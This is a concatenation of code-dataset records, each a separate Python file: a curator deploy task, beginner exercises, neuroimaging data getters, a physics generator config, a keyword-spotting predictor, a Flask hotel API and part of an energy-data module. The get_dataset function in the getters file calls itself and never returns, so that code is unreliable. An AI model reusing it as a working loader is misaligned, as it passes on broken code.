debian.add_apt_repository(repository)\n\n info('Adding apt key for', repository)\n debian.add_apt_key('https://packages.elastic.co/GPG-KEY-elasticsearch')\n debian.apt_get_update()\n\n version = blueprint.get('version', 'latest')\n info('Installing {} version {}', 'elasticsearch-curator', version)\n package = 'elasticsearch-curator' + ('={}'.format(version) if version != 'latest' else '')\n debian.apt_get('install', package)\n\n\ndef yaml_boolean(input):\n return str(input).lower()\n\n\n@task\ndef configure():\n \"\"\"\n Configure Curator\n \"\"\"\n\n actions = [\n {\n 'action': 'delete_indices',\n 'prefix': prefix,\n 'days_gt': days_gt\n }\n for prefix, days_gt\n in blueprint.get('actions.delete', {}).items()\n ]\n\n context = {\n 'es_hosts': yaml.dump(blueprint.get('es_hosts', []) or ['localhost']),\n 'timeout': blueprint.get('timeout', 60),\n 'actions': actions\n }\n\n debian.mkdir(\"/etc/curator/\", owner='elasticsearch')\n blueprint.upload('./', \"/etc/curator/\", context=context, user='elasticsearch')\n","sub_path":"blues/curator.py","file_name":"curator.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"56752924","text":"#!/usr/bin/python3\n\nprint(\"Welcome to our first python program! Coded from terminal.\")\nuser_response = input(\"Do you want to proceed?[Y/n]\")\n\nif user_response == \"Y\":\n\tuser_name = input(\"Enter username: \")\n\tuser_course = input(\"Enter course name: \")\n\tprint(\"Welcome \" + user_name + \" to the \" + user_course + \".\")\nelse:\n\tprint(\"Thanks for using this program, good bye!\") \n","sub_path":"userInput.py","file_name":"userInput.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"283670201","text":"n = int(input())\ncol = 2*n-1\nrow = n\nidx = n-1\nboard = [[0]*col for _ in range(row)]\nfor i in range(col):\n cnt = 2*i + 1\n for j in range(idx,idx+cnt):\n board[i][j] = 1\n idx-=1\n if idx<0:break\nfor i in range(row):\n Blank = False\n for j in range(col):\n if board[i][j]==0 and not Blank:print(' ',end='')\n elif board[i][j] == 1:\n Blank = True\n print('*',end='')\n elif board[i][j]==0 and Blank:\n print()\n break\n","sub_path":"파이썬연습/별찍기.py","file_name":"별찍기.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"241444952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nData grabbers\n\"\"\"\nfrom __future__ import print_function, division, absolute_import, unicode_literals\n\nfrom pathlib import Path\nfrom ..data.utils import _get_dataset_dir, _fetch_file\n\n\nOSF_PROJECT_URL = ('https://files.osf.io/v1/resources/fvuh8/providers/osfstorage/')\nOSF_RESOURCES = {\n 'MNI152NLin2009cAsym': ('5b0dbce20f461a000db8fa3d', '5d386d7db9c1dec30230623db25e05e1'),\n 'OASIS30ANTs': ('5b0dbce34c28ef0012c7f788', 
'f625a0390eb32a7852c7b0d71ac428cd'),\n 'brainweb': ('57f32b96b83f6901f194c3ca', '384263fbeadc8e2cca92ced98f224c4b'),\n 'ds003_downsampled': ('57f328f6b83f6901ef94cf70', '5a558961c1eb5e5f162696d8afa956e8'),\n 'mni_template': ('57f32ab29ad5a101fb77fd89', 'debfa882b8c301cd6d75dd769e73f727'),\n 'mni_template_RAS': ('57f32a799ad5a101f977eb77', 'a4669f0e7acceae148bb39450b2b21b4'),\n 'ants_oasis_template': ('57f32ae89ad5a101f977eb79', '34d39070b541c416333cc8b6c2fe993c'),\n 'ants_oasis_template_ras': ('584123a29ad5a1020913609d', 'afa21f99c66ae1672320d8aa0408229a'),\n 'ants_nki_template_ras': ('59cd90f46c613b02b3d79782', 'e5debaee65b8f2c8971577db1327e314'),\n 'mni_epi': ('57fa09cdb83f6901d93623a0', '9df727e1f742ec55213480434b4c4811'),\n 'mni152_nlin_sym_las': ('57fa7fc89ad5a101e635eeef', '9c4c0cad2a2e99d6799f01abf4107f5a'),\n 'mni152_nlin_sym_ras': ('57fa7fd09ad5a101df35eed0', '65d64ad5a980da86e7d07d95b3ed2ccb'),\n 'mni_icbm152_linear': ('580705eb594d9001ed622649', '72be639e92532def7caad75cb4058e83'),\n 'mni_icbm152_nlin_asym_09c': ('580705089ad5a101f17944a9', '002f9bf24dc5c32de50c03f01fa539ec'),\n 'tpl-OASISTRT20': ('5b16f17aeca4a80012bd7542', '1b5389bc3a895b2bd5c0d47401107176'),\n 'tpl-hcpLR32k': ('5b198ec6b796ba000f3e4858', '0ba9adcaa42fa88616a4cea5a1ce0c5a'),\n 'tpl-conte69': ('5b198ec5ec24e20011b48548', 'bd944e3f9f343e0e51e562b440960529'),\n}\n\nBIDS_EXAMPLES = {\n 'BIDS-examples-1-1.0.0-rc3u5': (\n 'https://github.com/chrisfilo/BIDS-examples-1/archive/1.0.0-rc3u5.tar.gz',\n '035fe54445c56eff5bd845ef3795fd56'),\n 'BIDS-examples-1-enh-ds054': (\n 'http://github.com/chrisfilo/BIDS-examples-1/archive/enh/ds054.zip',\n '56cee272860624924bc23efbe868acb7'),\n}\n\n# Map names of templates to OSF_RESOURCES keys\nTEMPLATE_MAP = {\n 'MNI152NLin2009cAsym': 'MNI152NLin2009cAsym',\n 'OASIS': 'OASIS30ANTs',\n 'NKI': 'ants_nki_template_ras',\n}\n\n\ndef get_dataset(dataset_name, data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load one of the datasets listed in OSF_RESOURCES\n\n\n :param str dataset_name: key of the dataset in OSF_RESOURCES; template\n names from TEMPLATE_MAP are also accepted.\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. 
Overwrite the default URL.\n\n \"\"\"\n return get_dataset('ds003_downsampled', data_dir, url, resume, verbose)\n\n\ndef get_mni_template(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n\n\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n\n \"\"\"\n return get_dataset('mni_template', data_dir, url, resume, verbose)\n\n\ndef get_mni_template_ras(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('mni_template_RAS', data_dir, url, resume, verbose)\n\n\ndef get_mni_epi(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('mni_epi', data_dir, url, resume, verbose)\n\n\ndef get_ants_oasis_template(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the ANTs template of the OASIS dataset.\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('ants_oasis_template', data_dir, url, resume, verbose)\n\n\ndef get_ants_oasis_template_ras(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the ANTs template of the OASIS dataset.\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('ants_oasis_template_ras', data_dir, url, resume, verbose)\n\n\ndef get_ants_nki_template_ras(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the ANTs template of the NKI dataset.\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('ants_nki_template_ras', data_dir, url, resume, verbose)\n\n\ndef get_mni152_nlin_sym_las(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('mni152_nlin_sym_las', data_dir, url, resume, verbose)\n\n\ndef get_mni152_nlin_sym_ras(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. 
Overwrite the default URL.\n \"\"\"\n return get_dataset('mni152_nlin_sym_ras', data_dir, url, resume, verbose)\n\n\ndef get_mni_icbm152_nlin_asym_09c(data_dir=None, url=None, resume=True, verbose=1):\n return get_dataset('mni_icbm152_nlin_asym_09c', data_dir, url, resume, verbose)\n\n\ndef get_mni_icbm152_linear(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the mni template\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('mni_icbm152_linear', data_dir, url, resume, verbose)\n\n\ndef get_bids_examples(data_dir=None, url=None, resume=True, verbose=1, variant=None):\n \"\"\"\n Download BIDS-examples-1\n \"\"\"\n\n if variant is None or variant not in BIDS_EXAMPLES:\n variant = 'BIDS-examples-1-1.0.0-rc3u5'\n\n if url is None:\n url = BIDS_EXAMPLES[variant][0]\n md5 = BIDS_EXAMPLES[variant][1]\n data_dir = _get_dataset_dir(variant, data_dir=data_dir, verbose=verbose)\n\n if _fetch_file(url, data_dir, filetype=None, resume=resume, verbose=verbose,\n md5sum=md5):\n return data_dir\n else:\n return None\n\n\ndef get_oasis_dkt31_mni152(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files from the Mindboggle DKT31 label\n atlas in MNI152NLin2009cAsym space\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('tpl-OASISTRT20', data_dir, url, resume, verbose)\n\n\ndef get_hcp32k_files(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load the necessary files for conversion between fsaverage5/6\n and fs_LR(32k)\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('tpl-hcpLR32k', data_dir, url, resume, verbose)\n\n\ndef get_conte69_mesh(data_dir=None, url=None, resume=True, verbose=1):\n \"\"\"Download and load Conte69-atlas meshes in 32k resolution\n :param str data_dir: path of the data directory. Used to force data storage\n in a non-standard location.\n :param str url: download URL of the dataset. Overwrite the default URL.\n \"\"\"\n return get_dataset('tpl-conte69', data_dir, url, resume, verbose)\n","sub_path":"niworkflows/data/getters.py","file_name":"getters.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"564405392","text":"import FWCore.ParameterSet.Config as cms\n\nfrom Configuration.Generator.PythiaUEZ2starSettings_cfi import *\nfrom GeneratorInterface.ExternalDecays.TauolaSettings_cff import *\n\ngenerator = cms.EDFilter(\"Pythia6HadronizerFilter\",\n pythiaHepMCVerbosity = cms.untracked.bool(True),\n maxEventsToPrint = cms.untracked.int32(0),\n pythiaPylistVerbosity = cms.untracked.int32(1),\n comEnergy = cms.double(8000.0),\n ExternalDecays = cms.PSet(\n Tauola = cms.untracked.PSet(\n TauolaPolar,\n TauolaDefaultInputCards\n ),\n parameterSets = cms.vstring('Tauola')\n ),\n UseExternalGenerators = cms.untracked.bool(True),\n PythiaParameters = cms.PSet(\n pythiaUESettingsBlock,\n processParameters = cms.vstring('MSEL=0 ! User defined processes', \n 'PMAS(5,1)=4.8 ! 
b quark mass',\n 'PMAS(6,1)=172.5 ! t quark mass',\n\t\t\t'MSTJ(1)=1 ! Fragmentation/hadronization on or off',\n\t\t\t'MSTP(61)=1 ! Parton showering on or off',\n 'MDME(174,1)=0 !Z decay into d dbar', \n 'MDME(175,1)=0 !Z decay into u ubar', \n 'MDME(176,1)=0 !Z decay into s sbar', \n 'MDME(177,1)=1 !Z decay into c cbar', \n 'MDME(178,1)=1 !Z decay into b bbar', \n 'MDME(179,1)=0 !Z decay into t tbar', \n 'MDME(182,1)=0 !Z decay into e- e+', \n 'MDME(183,1)=0 !Z decay into nu_e nu_ebar', \n 'MDME(184,1)=0 !Z decay into mu- mu+', \n 'MDME(185,1)=0 !Z decay into nu_mu nu_mubar', \n 'MDME(186,1)=0 !Z decay into tau- tau+', \n 'MDME(187,1)=0 !Z decay into nu_tau nu_taubar'), \n # This is a vector of ParameterSet names to be read, in this order\n parameterSets = cms.vstring('pythiaUESettings', \n 'processParameters')\n ),\n jetMatching = cms.untracked.PSet(\n scheme = cms.string(\"Madgraph\"),\n mode = cms.string(\"auto\"),\t# soup, or \"inclusive\" / \"exclusive\"\n MEMAIN_nqmatch = cms.int32(5),\n MEMAIN_etaclmax = cms.double(5),\n MEMAIN_qcut = cms.double(23.0),\n MEMAIN_minjets = cms.int32(0),\n MEMAIN_maxjets = cms.int32(2),\n MEMAIN_showerkt = cms.double(0), \n MEMAIN_excres = cms.string(\"\"),\n outTree_flag = cms.int32(0) \n ) \n)\n","sub_path":"genfragments/EightTeV/Hadronizer/Hadronizer_MgmMatchTuneZ2starEWKHiggsinoForceZccbb_8TeV_madgraph_tauola_cff.py","file_name":"Hadronizer_MgmMatchTuneZ2starEWKHiggsinoForceZccbb_8TeV_madgraph_tauola_cff.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"15468686","text":"for _ in range(int(input())):\n n = int(input())\n arr = [int(i) for i in input().split()]\n\n\n def max_m(arr):\n maximal_m = abs(arr[1] - arr[0])\n for i in range(len(arr) - 1):\n if abs(arr[i + 1] - arr[i]) > maximal_m:\n maximal_m = abs(arr[i + 1] - arr[i])\n return maximal_m\n\n\n arr_min_1 = []\n\n if arr[0] != -1 and arr[1] == -1:\n arr_min_1.append(arr[0])\n\n for i in range(1, len(arr) - 1):\n if arr[i] != -1 and (arr[i + 1] == -1 or arr[i - 1] == -1):\n arr_min_1.append(arr[i])\n\n # check the last element against its left neighbour\n # (arr[n - 1] is arr[-1] itself, so the original comparison was always False)\n if arr[-1] != -1 and arr[n - 2] == -1:\n arr_min_1.append(arr[-1])\n\n k = (max(arr_min_1) + min(arr_min_1)) / 2\n\n arr_new = []\n for i in range(len(arr)):\n if arr[i] == -1:\n arr_new.append(k)\n else:\n arr_new.append(arr[i])\n\n m = max_m(arr_new)\n\n print(int(m), int(k))\n","sub_path":"montaraka_birthday_2.py","file_name":"montaraka_birthday_2.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"521149623","text":"\nimport os\n\nimport librosa\nfrom scipy.io import wavfile\nimport scipy.signal as sps\nimport tensorflow as tf\nimport numpy as np\nfrom pydub import AudioSegment, effects \n\nSAVED_MODEL_PATH = \"model01.h5\"\n\nSAMPLES_TO_CONSIDER = 22050\n\nclass _Keyword_Spotting_Service:\n\n\n model = None\n _mapping = [\n \"\\u0631\",\n \"\\u0628\",\n \"\\u0643\",\n \"\\u0645\",\n \"\\u0639\",\n \"\\u0634\",\n \"\\u0623\",\n \"\\u0632\",\n \"\\u0647\",\n \"\\u0646\",\n \"\\u0636\",\n \"\\u0635\",\n 
\"\\u062a\",\n \"\\u0648\",\n \"\\u062f\",\n \"\\u062d\",\n \"\\u064a\",\n \"\\u0638\",\n \"\\u0642\",\n \"\\u063a\",\n \"\\u062b\",\n \"\\u0633\",\n \"\\u0630\",\n \"\\u062c\",\n \"\\u0641\",\n \"\\u0644\",\n \"\\u0637\",\n \"\\u062e\"\n ]\n \n\n _instance = None\n\n\n def predict(self, file_path):\n\n\n # extract MFCC\n MFCCs = self.preprocess(file_path)\n\n MFCCs = MFCCs[np.newaxis, ..., np.newaxis]\n # print(MFCCs.shape)\n\n predictions = self.model.predict(MFCCs)\n predicted_index = np.argmax(predictions)\n predicted_keyword = self._mapping[predicted_index]\n return predicted_keyword\n\n\n def preprocess(self, file_path, num_mfcc=13, n_fft=2048, hop_length=512):\n\n\n # load audio file\n\n signal, sample_rate = librosa.load(file_path)\n\n if len(signal) >= SAMPLES_TO_CONSIDER:\n signal = signal[:SAMPLES_TO_CONSIDER]\n\n # extract MFCCs\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc=num_mfcc, n_fft=n_fft,\n hop_length=hop_length)\n # MFCCs = librosa.feature.melspectrogram(y=signal, sr=sample_rate, n_fft=2048, hop_length=1024)\n # MFCCs = librosa.power_to_db(MFCCs, ref=np.max)\n \n # print(MFCCs.shape)\n nx, ny= MFCCs.shape\n # print(nx,ny)\n # MFCCs= np.reshape(MFCCs, ((-1, 22, 128)))\n\n\n return MFCCs.T\n\n\ndef Keyword_Spotting_Service():\n\n\n if _Keyword_Spotting_Service._instance is None:\n _Keyword_Spotting_Service._instance = _Keyword_Spotting_Service()\n _Keyword_Spotting_Service.model = tf.keras.models.load_model(SAVED_MODEL_PATH)\n return _Keyword_Spotting_Service._instance\n\n\n\n\nif __name__ == \"__main__\":\n file=(\"/test/أ11 .wav\")\n\n # sound = AudioSegment.from_file(file)\n # print(\"----------Before Conversion--------\")\n # print(\"Frame Rate\", sound.frame_rate)\n # print(\"Channel\", sound.channels)\n # print(\"Sample Width\",sound.sample_width)\n\n # # Change Frame Rate\n \n # sound = sound.set_frame_rate(22000)\n # sound = effects.normalize(sound) \n\n # # Change Channel\n # sound = sound.set_channels(1)\n # # Change Sample Width\n # sound = sound.set_sample_width(2)\n \n # sound.export(file, format =\"wav\")\n \n kss = Keyword_Spotting_Service()\n kss1 = Keyword_Spotting_Service()\n\n assert kss is kss1\n\n # make a prediction\n keyword = kss.predict(file)\n print(keyword)\n","sub_path":"Recognition system/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"236232544","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nimport os\n\ndata_path = \"data/Real estate.csv\"\n\ndf = pd.read_csv(data_path, delimiter=\",\")\n\n# NH format\nmyScaler = MinMaxScaler()\nfeatures = df.iloc[:, 1:-1].to_numpy(copy=True, dtype=\"float64\")\n\nfeatures = myScaler.fit_transform(features)\n\nlabel = df.iloc[:, -1].to_numpy(copy=True, dtype=\"float64\").reshape([-1,1])\nlabel = myScaler.fit_transform(label)\n\nshuffle_idx = np.random.permutation(range(features.shape[0]))\n\nfeatures = features[shuffle_idx, :]\nlabel = label[shuffle_idx]\n\nfeature_file = open(\"data/features_realEstate.txt\", \"w\")\nfor row in features:\n np.savetxt(feature_file, row, fmt=\"%f\")\n\nfeature_file.close()\n\nlabel_file = open(\"data/label_realEstate.txt\", \"w\")\nfor row in label:\n np.savetxt(label_file, row, fmt=\"%f\")\n\nlabel_file.close()\n\nnp.save(\"data/features_admission.npy\", features)\nnp.save(\"data/label_admission.npy\", 
\nnp.save(\"data/features_realEstate.npy\", features)\nnp.save(\"data/label_realEstate.npy\", label)\n\n\n","sub_path":"dataset_utils/dataset_realEstate.py","file_name":"dataset_realEstate.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"362355147","text":"from flask_restful import Resource, reqparse\nfrom flask_jwt_extended import jwt_required\nfrom models.hotel import HotelModel\nfrom models.site import SiteModel\nfrom resources.filtros import *\nimport mysql.connector\nfrom env import MYSQL_USER, MYSQL_PASS, MYSQL_HOST, MYSQL_DB\n\npath_params = reqparse.RequestParser()\npath_params.add_argument('cidade', type=str)\npath_params.add_argument('estrelas_min', type=float)\npath_params.add_argument('estrelas_max', type=float)\npath_params.add_argument('diaria_min', type=float)\npath_params.add_argument('diaria_max', type=float)\npath_params.add_argument('limit', type=int)\npath_params.add_argument('offset', type=int)\n\nclass Hoteis(Resource):\n def get(self):\n connection = mysql.connector.connect(user=MYSQL_USER, password=MYSQL_PASS, host=MYSQL_HOST, database=MYSQL_DB)\n cursor = connection.cursor()\n\n dados = path_params.parse_args()\n dados_validos = {chave:dados[chave] for chave in dados if dados[chave] is not None}\n parametros = normalize_path_params(**dados_validos)\n\n if not parametros.get('cidade'):\n consulta = consulta_sem_cidade\n else:\n consulta = consulta_com_cidade\n tupla = tuple([parametros[chave] for chave in parametros])\n cursor.execute(consulta, tupla)\n resultado = cursor.fetchall()\n hoteis = []\n if resultado:\n for linha in resultado:\n hoteis.append({\n 'id': linha[0],\n 'nome': linha[1],\n 'estrelas': linha[2],\n 'diaria': linha[3],\n 'cidade': linha[4],\n 'site_id': linha[5]\n })\n return {'hoteis': hoteis}\n\nclass Hotel(Resource):\n argumentos = reqparse.RequestParser()\n argumentos.add_argument('nome', type=str, required=True, help=\"The field 'nome' cannot be left blank\")\n argumentos.add_argument('estrelas', type=float, required=True, help=\"The field 'estrelas' cannot be left blank\")\n argumentos.add_argument('diaria')\n argumentos.add_argument('cidade')\n argumentos.add_argument('site_id', type=int, required=True, help=\"Every hotel needs to be linked with a site\")\n\n def get(self, hotel_id):\n hotel = HotelModel.find(hotel_id)\n if hotel:\n return hotel.json()\n return {'message': 'Hotel not found.'}, 404\n\n @jwt_required\n def post(self, hotel_id):\n if HotelModel.find(hotel_id):\n return {\"message\":\"Id '{}' already exists.\".format(hotel_id)}, 400\n dados = Hotel.argumentos.parse_args()\n hotel = HotelModel(hotel_id, **dados)\n if not SiteModel.find_id(dados.get('site_id')):\n return {'message': 'The hotel must be associated with a valid site id.'}, 400\n try:\n hotel.save()\n except:\n return {'message':'An internal error occurred trying to save hotel.'}, 500\n return hotel.json(), 200\n\n @jwt_required\n def put(self, hotel_id):\n dados = Hotel.argumentos.parse_args()\n hotel_encontrado = HotelModel.find(hotel_id)\n if hotel_encontrado:\n hotel_encontrado.update(**dados)\n hotel_encontrado.save()\n return hotel_encontrado.json(), 200\n hotel = HotelModel(hotel_id, **dados)\n try:\n hotel.save()\n except:\n return {'message':'An internal error occurred trying to save hotel.'}, 500\n return hotel.json(), 201\n
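\n # Request sketch (assumes a routing like api.add_resource(Hotel,\n # '/hoteis/<hotel_id>') elsewhere in the app; illustrative only):\n # GET /hoteis/alpha -> 200 hotel JSON, or 404\n # POST /hoteis/alpha (JWT) -> 200 created, 400 if the id exists\n # PUT /hoteis/alpha (JWT) -> 200 updated / 201 created\n # DELETE /hoteis/alpha (JWT) -> 200 'Hotel deleted.', or 404\n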
\n @jwt_required\n def delete(self, hotel_id):\n hotel = HotelModel.find(hotel_id)\n if hotel:\n try:\n hotel.delete()\n except:\n return {'message':'An internal error occurred trying to delete hotel.'}, 500\n return {'message': 'Hotel deleted.'}, 200\r\n return {'message': 'Hotel not found.'}, 404\r\n","sub_path":"resources/hotel.py","file_name":"hotel.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"194717064","text":"\"\"\"A module with functions to aid generating MCOE.\"\"\"\n\nfrom pudl import analysis, clean_pudl, outputs, pudl\nfrom pudl import constants as pc\nimport numpy as np\nimport pandas as pd\n\n\ndef gens_with_bga(bga_eia860, gen_eia923):\n \"\"\"\n Label EIA generators based on which type of associations they have.\n\n Given the boiler generator associations and the generation records,\n label each generator according to which kinds of associations it has\n had. Three boolean values are set for each generator, for each time\n period:\n - boiler_generator_assn: True if the generator has any boilers\n associated with it, False otherwise.\n - plant_assn: True if all the generators associated with a given\n plant_id have a boiler associated with them, False otherwise.\n - complete_assn: True if the generator has *ever* been part of a\n plant in which all generators had a boiler associated with them,\n False otherwise.\n\n Returns:\n A dataframe containing plant_id_eia, generator_id, boiler_id, and\n the three boolean columns mentioned above.\n \"\"\"\n # All generators from the Boiler Generator Association table (860)\n bga8 = bga_eia860[['report_date', 'plant_id_eia',\n 'generator_id', 'boiler_id']]\n\n # All generators from the generation_eia923 table, by year.\n gens9 = gen_eia923[['report_date', 'plant_id_eia',\n 'generator_id']].drop_duplicates()\n\n # Merge in the boiler associations across all the different years of\n # generator - plant associations.\n gens = analysis.merge_on_date_year(gens9, bga8, how='left',\n on=['plant_id_eia', 'generator_id'])\n # Set a boolean flag on each record indicating whether the plant-generator\n # pairing has a boiler associated with it.\n gens['boiler_generator_assn'] = \\\n np.where(gens.boiler_id.isnull(), False, True)\n\n # Find all the generator records that were ever missing a boiler:\n unassociated_generators = gens[~gens['boiler_generator_assn']]\n # Create a list of plants with unassociated generators, by year.\n unassociated_plants = unassociated_generators.\\\n drop_duplicates(subset=['plant_id_eia', 'report_date']).\\\n drop(['generator_id', 'boiler_id', 'boiler_generator_assn'], axis=1)\n # Tag those plant-years as being unassociated\n unassociated_plants['plant_assn'] = False\n\n # Merge the plant association flag back in to the generators\n gens = pd.merge(gens, unassociated_plants, how='left',\n on=['plant_id_eia', 'report_date'])\n # Tag the rest of the generators as being part of a plant association...\n # This may or may not be true. Need to filter out partially associated\n # plants in the next step.\n gens['plant_assn'] = gens.plant_assn.fillna(value=True)\n\n # Using the associated plants, extract the generator/boiler combos\n # that represent complete plants at any time to preserve\n # associations (i.e. 
if a coal plant had its boilers and generators\n # fully associated in the bga table in 2011 and then adds a\n # combined cycle plant, the coal boiler/gen combo will be saved).\n\n # Remove the report_date:\n gens_complete = gens.drop('report_date', axis=1)\n # Select only those generators tagged as being part of a complete plant:\n gens_complete = gens_complete[gens_complete['plant_assn']]\n\n gens_complete = gens_complete.drop_duplicates(subset=['plant_id_eia',\n 'generator_id',\n 'boiler_id'])\n gens_complete['complete_assn'] = True\n\n gens = gens.merge(gens_complete[['plant_id_eia', 'generator_id',\n 'boiler_id', 'complete_assn']],\n how='left',\n on=['plant_id_eia', 'generator_id', 'boiler_id'])\n gens['complete_assn'] = gens.complete_assn.fillna(value=False)\n\n return(gens)\n\n\ndef boiler_generator_association(bga_eia860, gens_eia860,\n gen_eia923, bf_eia923,\n start_date=None, end_date=None,\n testing=False):\n \"\"\"\n Temporary function to create more complete boiler generator associations.\n\n This is a temporary function until it can be pulled into a datatable. This\n function pulls in all of the generators and all of the boilers, and uses them\n to create a relatively complete association list. First, the original bga\n table is used, then the remaining unmatched generators are matched to the\n boilers with the same string (in the same plant and year), then the unit\n codes are used to connect all generators and boilers within each given\n unit. Each of the incomplete or inaccurate records is tagged in columns.\n\n Notes:\n - unit_code is coming out as a mix of None and NaN values. Should pick\n a single type for the column and stick to it (or enforce on output).\n \"\"\"\n pudl_engine = pudl.db_connect_pudl(testing=testing)\n # compile and scrub all the parts\n bga_eia860.drop_duplicates(['plant_id_eia', 'boiler_id',\n 'generator_id', 'report_date'], inplace=True)\n bga_eia860.drop(['id', 'operator_id'], axis=1, inplace=True)\n\n gen_eia923 = gen_eia923.set_index(pd.DatetimeIndex(gen_eia923.report_date))\n gen_eia923_gb = gen_eia923.groupby(\n [pd.Grouper(freq='AS'), 'plant_id_eia', 'generator_id'])\n gen_eia923 = gen_eia923_gb['net_generation_mwh'].sum().reset_index()\n gen_eia923['missing_from_923'] = False\n\n # The generator records that are missing from 860 but appear in 923\n # I created issue no. 
128 to deal with this at a later date\n merged = pd.merge(gens_eia860, gen_eia923,\n on=['plant_id_eia', 'report_date', 'generator_id'],\n indicator=True, how='outer')\n missing = merged[merged['_merge'] == 'right_only']\n\n # compile all of the generators\n gens = pd.merge(gen_eia923, gens_eia860,\n on=['plant_id_eia', 'report_date', 'generator_id'],\n how='outer')\n\n gens = gens[['plant_id_eia',\n 'report_date',\n 'generator_id',\n 'unit_code',\n 'net_generation_mwh',\n 'missing_from_923']].drop_duplicates()\n\n # create the beginning of a bga compilation w/ the generators as the\n # background\n bga_compiled_1 = pd.merge(gens, bga_eia860,\n on=['plant_id_eia', 'generator_id',\n 'report_date'],\n how='outer')\n\n # Side note: there are only 6 generators that appear in bga8 that don't\n # appear in gens9 or gens8 (must uncomment the og_tag creation above)\n # bga_compiled_1[bga_compiled_1['og_tag'].isnull()]\n\n bf_eia923 = bf_eia923.set_index(pd.DatetimeIndex(bf_eia923.report_date))\n bf_eia923_gb = bf_eia923.groupby(\n [pd.Grouper(freq='AS'), 'plant_id_eia', 'boiler_id'])\n bf_eia923 = bf_eia923_gb['total_heat_content_mmbtu'].sum().reset_index()\n\n bf_eia923.drop_duplicates(\n subset=['plant_id_eia', 'report_date', 'boiler_id'], inplace=True)\n\n # Create a set of bga's that are linked, directly from bga8\n bga_assn = bga_compiled_1[bga_compiled_1['boiler_id'].notnull()].copy()\n bga_assn['bga_source'] = 'eia860_org'\n\n # Create a set of bga's that were not linked directly through bga8\n bga_unassn = bga_compiled_1[bga_compiled_1['boiler_id'].isnull()].copy()\n bga_unassn = bga_unassn.drop(['boiler_id'], axis=1)\n\n # Create a list of boilers that were not in bga8\n bf9_bga = bf_eia923.merge(bga_compiled_1,\n on=['plant_id_eia', 'boiler_id', 'report_date'],\n how='outer',\n indicator=True)\n bf9_not_in_bga = bf9_bga[bf9_bga['_merge'] == 'left_only']\n bf9_not_in_bga = bf9_not_in_bga.drop(['_merge'], axis=1)\n\n # Match the unassociated generators with unassociated boilers\n # This method assumes that some of the strings of the generators and the\n # boilers are the same\n bga_unassn = bga_unassn.merge(bf9_not_in_bga[['plant_id_eia',\n 'boiler_id',\n 'report_date']],\n how='left',\n left_on=['report_date',\n 'plant_id_eia',\n 